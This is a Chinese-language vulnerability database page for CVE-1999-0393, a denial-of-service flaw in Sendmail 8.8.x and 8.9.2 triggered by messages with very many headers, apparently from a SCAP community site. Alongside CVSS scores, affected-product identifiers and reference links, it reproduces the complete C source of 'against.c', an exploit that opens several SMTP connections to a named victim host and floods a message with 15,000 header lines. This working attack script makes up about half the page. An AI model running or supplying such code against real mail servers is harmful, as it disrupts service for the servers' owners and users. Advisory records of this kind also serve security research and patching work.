CVE-1999-0393
CVSS5.0
发布时间 :1999-01-01 00:00:00
修订时间 :2016-10-17 21:59:15
NMCOE    

[原文]Remote attackers can cause a denial of service in Sendmail 8.8.x and 8.9.2 by sending messages with a large number of headers.


[CNNVD]Sendmail拒绝服务漏洞(CNNVD-199901-003)

        Sendmail 8.8.x 和 8.9.2版本中存在漏洞。远程攻击者通过发送带有大量标题的消息导致拒绝服务。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:eric_allman:sendmail:8.8
cpe:/a:eric_allman:sendmail:8.9.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0393
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0393
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199901-003
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=91694391227372&w=2
(UNKNOWN)  BUGTRAQ  19990121 Sendmail 8.8.x/8.9.x bugware

- 漏洞信息

Sendmail拒绝服务漏洞
中危 未知
1999-01-01 00:00:00 2005-05-02 00:00:00
远程  
        Sendmail 8.8.x 和 8.9.2版本中存在漏洞。远程攻击者通过发送带有大量标题的消息导致拒绝服务。

- 公告与补丁

        

- 漏洞信息 (23167)

Sendmail 8.9.2 Headers Prescan Denial Of Service Vulnerability (EDBID:23167)
irix dos
1998-12-12 Verified
0 marchew
N/A [点击下载]
source: http://www.securityfocus.com/bid/8674/info

Sendmail has been reported prone to a denial of service vulnerability when handling malicious SMTP mail headers. The vulnerability has been reported to present itself, due to an inefficient implementation of a header prescan algorithm.

A remote attacker may reportedly deny service to legitimate users by sending specially crafted emails to the affected service.

/*
	      against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.2)
	      (c) 1999 by <marchew@linux.lepszy.od.kobiety.pl>
	
	      Usage: ./against existing_user_on_victim_host victim_host
	      Example: ./against nobody lamers.net
	
	    */
	
	    #include <stdio.h>
	    #include <unistd.h>
	    #include <sys/param.h>
	    #include <sys/socket.h>
	    #include <sys/time.h>
	    #include <netinet/in.h>
	    #include <netdb.h>
	    #include <stdarg.h>
	    #include <errno.h>
	    #include <signal.h>
	    #include <getopt.h>
	    #include <stdlib.h>
	    #include <string.h>
	
	    #define MAXCONN 4
	    #define LINES   15000
	
	    struct hostent *hp;
	    struct sockaddr_in s;
	    int suck,loop,x;
	
	    int main(int argc,char* argv[]) {
	
	      printf("against.c - another Sendmail DoS (up to 8.9.2)\n");
	
	      if (argc-3) {
		printf("Usage: %s victim_user victim_host\n",argv[0]);
		exit(0);
	      }
	
	      hp=gethostbyname(argv[2]);
	
	      if (!hp) {
		perror("gethostbyname");
		exit(1);
	      }
	
	      fprintf(stderr,"Doing mess: ");
	
	      for (;loop<MAXCONN;loop++) if (!(x=fork())) {
		FILE* d;
		bcopy(hp->h_addr,(void*)&s.sin_addr,hp->h_length);
		s.sin_family=hp->h_addrtype;
		s.sin_port=htons(25);
		if ((suck=socket(AF_INET,SOCK_STREAM,0))<0) perror("socket");
		if (connect(suck,(struct sockaddr *)&s,sizeof(s))) perror("connect");
		if (!(d=fdopen(suck,"w"))) { perror("fdopen"); exit(0); }
	
		usleep(100000);
	
		fprintf(d,"helo tweety\n");
		fprintf(d,"mail from: tweety@polbox.com\n");
		fprintf(d,"rcpt to: %s@%s\n",argv[1],argv[2]);
		fprintf(d,"data\n");
	
		usleep(100000);
	
		for(loop=0;loop<LINES;loop++) {
		  if (!(loop%100)) fprintf(stderr,".");
		  fprintf(d,"To: x\n");
		}
	
		fprintf(d,"\n\n\nsomedata\n\n\n");
	
		fprintf(d,".\n");
	
		sleep(1);
	
		fprintf(d,"quit\n");
		fflush(d);
	
		sleep(100);
		shutdown(suck,2);
		close(suck);
		exit(0);
	      }
	
	      waitpid(x,&loop,0);
	
	      fprintf(stderr,"ok\n");
	
	      return 0;
	    }
		

- 漏洞信息

9310
Sendmail Header Prescan Function Message Header DoS
Denial of Service
Loss of Availability Upgrade
Exploit Public Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

1999-01-20 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站